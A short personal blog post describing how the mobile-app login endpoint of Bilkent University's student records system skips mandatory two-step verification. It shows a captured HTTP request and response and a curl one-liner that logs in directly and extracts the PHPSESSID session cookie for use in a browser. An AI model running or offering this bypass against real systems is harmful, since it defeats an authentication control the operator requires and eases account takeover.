pythech's Blog

Not a hacker blog

Bilkent SRS Two-Factor Authentication Bypass

Starting this semester, our school requires Two-Factor Authentication via SMS or e-mail for the “student management system” of our sorts. While it sounds like a good idea, it’s not opt-in or opt-out, meaning you cannot disable it. And sometimes it takes minutes to recieve the code, something that is very annoying for a quick visit or when you don’t have much time.

Technically, it’s actually Two-Step Verification but nobody cares about the difference between the two these days, right? At least that’s what the website calls it. Anyway I didn’t really do anything fancy, it’s just common sense: Why does the website require an SMS code while the mobile app for SRS works perfectly as is. You’d expect the mobile app to get limited priviledges, an API etc. but nope, it’s just a plain HTML renderer. What does this mean is that it somehow logins to the website without using the 2FA, in fact I’m not the one bypassing it, it’s the LEGACY CODE!

Phew, that was hard, using a simple local proxy solves the mystery:

1
2
3
4
5
6
7
8
9
10
11
POST /srs/ajax/login.php HTTP/1.1
Host: stars.bilkent.edu.tr
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Accept: */*
User-Agent: Bilkent STARS/1.8.1 (iPhone; iOS 9.3.3; Scale/2.00)
Accept-Language: en-TR;q=1, tr-TR;q=0.9
Accept-Encoding: gzip, deflate
Content-Length: REDACTED

ID=REDACTED&PWD=REDACTED
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
HTTP/1.1 200 OK
Date: Sun, 23 Oct 2016 12:02:17 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.29-1~dotdeb.0
Set-Cookie: PHPSESSID=REDACTED; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4
Keep-Alive: timeout=1, max=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

HOME

Now all you have to do is

1
2
3
curl -i -s -X POST \
    --data-binary 'ID=<YOUR_ID>&PWD=<YOUR_PASSWORD>' \
    'https://stars.bilkent.edu.tr/srs/ajax/login.php' | grep PHPSESSID | cut -c 23-48

and use the extracted PHPSESSID cookie on your browser of choice.